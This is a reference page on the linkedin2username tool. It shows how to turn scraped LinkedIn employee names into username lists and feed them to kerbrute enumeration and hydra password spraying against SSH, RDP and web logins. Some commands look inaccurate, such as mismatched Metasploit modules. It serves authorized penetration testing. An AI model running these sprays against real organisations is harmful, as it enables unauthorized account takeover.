linkedin2username
Overview
Sección titulada «Overview»linkedin2username is a tool that generates potential username lists from LinkedIn company employee data. During authorized penetration testing and security research, it helps identify valid usernames for targeted environments by analyzing publicly available employee information. The tool supports multiple naming conventions (firstname.lastname, firstnamelastname, flastname, etc.) and integrates with credential enumeration workflows for authorized security testing.
Installation
Sección titulada «Installation»# Clone from GitHub
git clone https://github.com/initstring/linkedin2username.git
cd linkedin2username
# Install dependencies
pip3 install -r requirements.txt
# Make executable
chmod +x linkedin2username.py# Clone repository
git clone https://github.com/initstring/linkedin2username.git
cd linkedin2username
# Install with pip
pip3 install -r requirements.txt
# Create symlink for easy access
sudo ln -s $(pwd)/linkedin2username.py /usr/local/bin/linkedin2usernameWindows
Sección titulada «Windows»# Clone repository
git clone https://github.com/initstring/linkedin2username.git
cd linkedin2username
# Install dependencies
pip install -r requirements.txt
# Run with Python
python linkedin2username.pyKali Linux
Sección titulada «Kali Linux»# Clone and install
git clone https://github.com/initstring/linkedin2username.git
cd linkedin2username
pip3 install -r requirements.txt
# Or install via apt
apt-get install linkedin2usernameBasic Usage
Sección titulada «Basic Usage»Simple Username Generation
Sección titulada «Simple Username Generation»| Command | Description |
|---|---|
python3 linkedin2username.py -c "Company Name" | Generate usernames from company employees |
python3 linkedin2username.py -c "Company" -f firstname.lastname | Custom format output |
python3 linkedin2username.py -c "Company" -o output.txt | Save to file |
python3 linkedin2username.py -l employees.txt | Use local HTML file |
Common Scenarios
Sección titulada «Common Scenarios»# Basic usage with company name
python3 linkedin2username.py -c "Acme Corporation"
# Save output to file
python3 linkedin2username.py -c "Acme" > usernames.txt
# Multiple companies
python3 linkedin2username.py -c "Company1" > company1.txt
python3 linkedin2username.py -c "Company2" > company2.txt
cat company*.txt > all_users.txt
# Use with other tools
python3 linkedin2username.py -c "Target" | tee target_users.txtOutput Formats
Sección titulada «Output Formats»Available Naming Conventions
Sección titulada «Available Naming Conventions»# firstname.lastname (John.Smith)
python3 linkedin2username.py -c "Company" -f "firstname.lastname"
# firstnamelastname (JohnSmith)
python3 linkedin2username.py -c "Company" -f "firstnamelastname"
# first.last (j.smith)
python3 linkedin2username.py -c "Company" -f "first.last"
# firstlast (jsmith)
python3 linkedin2username.py -c "Company" -f "firstlast"
# first_last (john_smith)
python3 linkedin2username.py -c "Company" -f "first_last"
# Custom format with initials
python3 linkedin2username.py -c "Company" -f "firstinitial.lastname"Format Examples
Sección titulada «Format Examples»# Given: John Smith
# Format 1: firstname.lastname → john.smith
# Format 2: firstnamelastname → johnsmith
# Format 3: first.last → j.smith
# Format 4: firstlast → jsmith
# Format 5: first_last → john_smith
# Format 6: flastname → jsmith
# Format 7: first → john
# Format 8: last → smithData Collection Methods
Sección titulada «Data Collection Methods»Using LinkedIn Company Pages
Sección titulada «Using LinkedIn Company Pages»# Method 1: Manual data extraction
# 1. Navigate to company LinkedIn page
# 2. Search for "current employees"
# 3. Export/copy employee list
# 4. Save as employees.txt
# Method 2: Using LinkedIn API (if available)
# Requires LinkedIn authentication
# Limited by terms of service
python3 linkedin2username.py -c "Company" --auth username:passwordScraping Employee Data
Sección titulada «Scraping Employee Data»# Using browser automation
# Save LinkedIn search results to HTML
# Option 1: Manual browser export
# 1. Open LinkedIn company page
# 2. Scroll through employees
# 3. Right-click → Save as... (employees.html)
# 4. Use with linkedin2username
python3 linkedin2username.py -l employees.html -c "Company"
# Option 2: Using Selenium (if supported)
# Automates LinkedIn data extractionWorking with Existing Data
Sección titulada «Working with Existing Data»# If you have employee list in text format
cat << 'EOF' > employees.txt
John Smith
Jane Doe
Bob Johnson
Alice Williams
EOF
# Convert to usernames
python3 linkedin2username.py -i employees.txt -f "firstlast"Advanced Techniques
Sección titulada «Advanced Techniques»Multiple Format Generation
Sección titulada «Multiple Format Generation»#!/bin/bash
# Generate all common username formats
COMPANY="Acme"
FORMATS=(
"firstname.lastname"
"firstnamelastname"
"first.last"
"firstlast"
"first_last"
"flastname"
)
for format in "${FORMATS[@]}"; do
echo "[*] Generating format: $format"
python3 linkedin2username.py -c "$COMPANY" -f "$format" \
>> ${COMPANY}_${format}.txt
done
# Combine and deduplicate
cat ${COMPANY}_*.txt | sort -u > ${COMPANY}_all_usernames.txtIntegrating with Credential Enumeration
Sección titulada «Integrating with Credential Enumeration»# Generate usernames
python3 linkedin2username.py -c "Target" -f "firstlast" > usernames.txt
# Prepare for password spraying
# Create user:password combinations
while read username; do
echo "${username}:Password123"
done < usernames.txt > credentials.txt
# Use with hydra
hydra -L usernames.txt -P passwords.txt \
-t 4 ssh://192.168.1.10
# Use with kerbrute
kerbrute userenum --dc 192.168.1.10 -d domain.local usernames.txtEmail Address Generation
Sección titulada «Email Address Generation»# From linkedin2username usernames, generate email addresses
# Assuming company domain is company.local
while read username; do
echo "${username}@company.local"
done < usernames.txt > emails.txt
# Generate variations
for username in $(cat usernames.txt); do
echo "${username}@company.local"
echo "${username}@company.com"
echo "${username}@mail.company.local"
done | sort -u > emails_all.txtData Processing and Analysis
Sección titulada «Data Processing and Analysis»Filtering Results
Sección titulada «Filtering Results»# Remove duplicates
sort -u usernames.txt > usernames_unique.txt
# Filter by pattern
grep "^[a-z]\." usernames.txt > firstname_initial.txt
# Count occurrences
cat usernames.txt | wc -l
# Find most common first names
cut -d'.' -f1 usernames.txt | sort | uniq -c | sort -rn
# Identify potential service accounts
grep -i "svc\|service\|admin\|test" usernames.txtCreating Target Lists
Sección titulada «Creating Target Lists»# Extract usernames only
python3 linkedin2username.py -c "Company" -f "firstlast" | \
awk '{print $1}' > targets.txt
# Create username frequency list
cat usernames.txt | sort | uniq -c | sort -rn > frequency.txt
# Identify common username patterns
cat usernames.txt | sed 's/[0-9]//g' | sort | uniq -c > pattern_analysis.txtIntegration with Penetration Testing Tools
Sección titulada «Integration with Penetration Testing Tools»Kerbrute Username Enumeration
Sección titulada «Kerbrute Username Enumeration»# Generate usernames
python3 linkedin2username.py -c "Target" -f "firstlast" > usernames.txt
# Use kerbrute to find valid AD usernames
kerbrute userenum --dc 192.168.1.10 \
-d domain.local usernames.txt
# Output valid usernames
kerbrute userenum --dc 192.168.1.10 \
-d domain.local usernames.txt -o valid_users.txtHydra Password Spraying
Sección titulada «Hydra Password Spraying»# Generate usernames with format suitable for hydra
python3 linkedin2username.py -c "Target" -f "firstlast" > users.txt
# Create password list
echo "Password123" > passes.txt
echo "Welcome2026" >> passes.txt
# SSH password spray
hydra -L users.txt -P passes.txt \
-t 4 -f ssh://192.168.1.100
# HTTP/HTTPS
hydra -L users.txt -P passes.txt \
-t 4 -f http-post-form://target.com/login
# RDP
hydra -L users.txt -P passes.txt \
-t 4 -f rdp://192.168.1.200Metasploit Integration
Sección titulada «Metasploit Integration»# Generate username list
python3 linkedin2username.py -c "Target" > usernames.txt
# Use in Metasploit for credential testing
msfconsole
# Load module for enumeration
use auxiliary/scanner/snmp/snmp_enum_users
# Or use with auxiliary SSH scanner
use auxiliary/scanner/ssh/ssh_version
# Set options
set USER_AS_PASS true
set RHOSTS 192.168.1.0/24Custom Scripting
Sección titulada «Custom Scripting»#!/bin/bash
# Integrated username generation and validation
COMPANY="Target"
DOMAIN="domain.local"
DC_IP="192.168.1.10"
echo "[*] Generating LinkedIn usernames for $COMPANY"
python3 linkedin2username.py -c "$COMPANY" -f "firstlast" > users_temp.txt
echo "[*] Validating usernames against AD..."
kerbrute userenum --dc $DC_IP -d $DOMAIN users_temp.txt -o valid_users.txt
echo "[*] Valid users found:"
cat valid_users.txt
echo "[*] Attempting to crack passwords..."
hydra -L valid_users.txt -P /usr/share/wordlists/rockyou.txt \
-t 4 ssh://$DC_IP
# Cleanup
rm users_temp.txtPrivacy and Legal Considerations
Sección titulada «Privacy and Legal Considerations»Authorized Data Collection
Sección titulada «Authorized Data Collection»# LinkedIn terms of service restrictions
# - Scraping violates LinkedIn ToS in most regions
# - Alternative: Use LinkedIn's official recruiter tools
# - For pen tests: Only use with written authorization
# - Must define scope: which companies/departments
# Documentation template
echo "LinkedIn2Username Authorization"
echo "Target Company: ACME Corporation"
echo "Scope: Current employees only"
echo "Purpose: Authorized penetration test"
echo "Duration: 2026-05-02 to 2026-05-15"
echo "Approval: [Manager Signature]"Ethical Usage Guidelines
Sección titulada «Ethical Usage Guidelines»# Responsible username generation
# 1. Only generate from authorized company
# 2. Use only within authorized test scope
# 3. Don't share usernames outside test team
# 4. Report findings securely
# 5. Cleanup and document usage
# Example report
cat << 'EOF' > engagement_report.txt
LinkedIn2Username Analysis Report
Target: ACME Corporation
Date: 2026-05-02
Scope: Authorized security testing
Findings:
- 542 LinkedIn employees identified
- 4 naming convention variations tested
- 267 unique username formats generated
- 89 valid AD usernames confirmed (via kerbrute)
- 12 accounts with weak/default passwords
Recommendations:
- Implement username policy controls
- Deploy MFA across all accounts
- Monitor for failed authentication attempts
- Review LinkedIn visibility policies
EOFTroubleshooting
Sección titulada «Troubleshooting»No Results Generated
Sección titulada «No Results Generated»# Company name not found
# Solution: Try variations
python3 linkedin2username.py -c "ACME"
python3 linkedin2username.py -c "Acme Corp"
python3 linkedin2username.py -c "ACME Corporation"
# Verify format string
python3 linkedin2username.py -c "Company" -h
# Check available format options
# Debug output
python3 linkedin2username.py -c "Company" -vFormat Issues
Sección titulada «Format Issues»# Special characters in names
# Solution: Script handles most cases, but verify output
python3 linkedin2username.py -c "Company" -f "firstlast" | head -20
# Numbers in names (Jr., II, III)
# These may be stripped depending on format
grep "[0-9]" usernames.txt
# Hyphenated names
# May be handled as single or separate
grep "\-" usernames.txtIntegration Problems
Sección titulada «Integration Problems»# Kerbrute not finding users
# Verify usernames match domain format
# Try different formats
python3 linkedin2username.py -c "Company" -f "first.last"
kerbrute userenum --dc dc.domain.local -d domain.local users.txt
# Password spraying timeout
# Reduce thread count
hydra -L users.txt -P pass.txt -t 2 ssh://target
# Check for account lockout policies
# Adjust spray rate accordinglyPerformance Optimization
Sección titulada «Performance Optimization»Processing Large Lists
Sección titulada «Processing Large Lists»# For 5000+ employees
# Split into smaller batches
split -l 1000 large_usernames.txt batch_
# Process in parallel
for batch in batch_*; do
kerbrute userenum --dc dc.domain.local \
-d domain.local $batch &
done
wait
# Combine results
cat valid_*.txt > all_valid_users.txtCaching Results
Sección titulada «Caching Results»# Save generated usernames for reuse
python3 linkedin2username.py -c "Company" -f "firstlast" \
> company_usernames_$(date +%Y%m%d).txt
# Search cache for existing lists
ls company_usernames_*.txt
grep "john" company_usernames_*.txtReferences
Sección titulada «References»- linkedin2username GitHub Repository
- LinkedIn Terms of Service
- Kerbrute User Enumeration
- Hydra Password Spraying
- OSINT Techniques for Penetration Testing
- Authorized Security Testing Guidelines
- Social Engineering Attacks
- MITRE ATT&CK T1589 Gather Victim Identity Information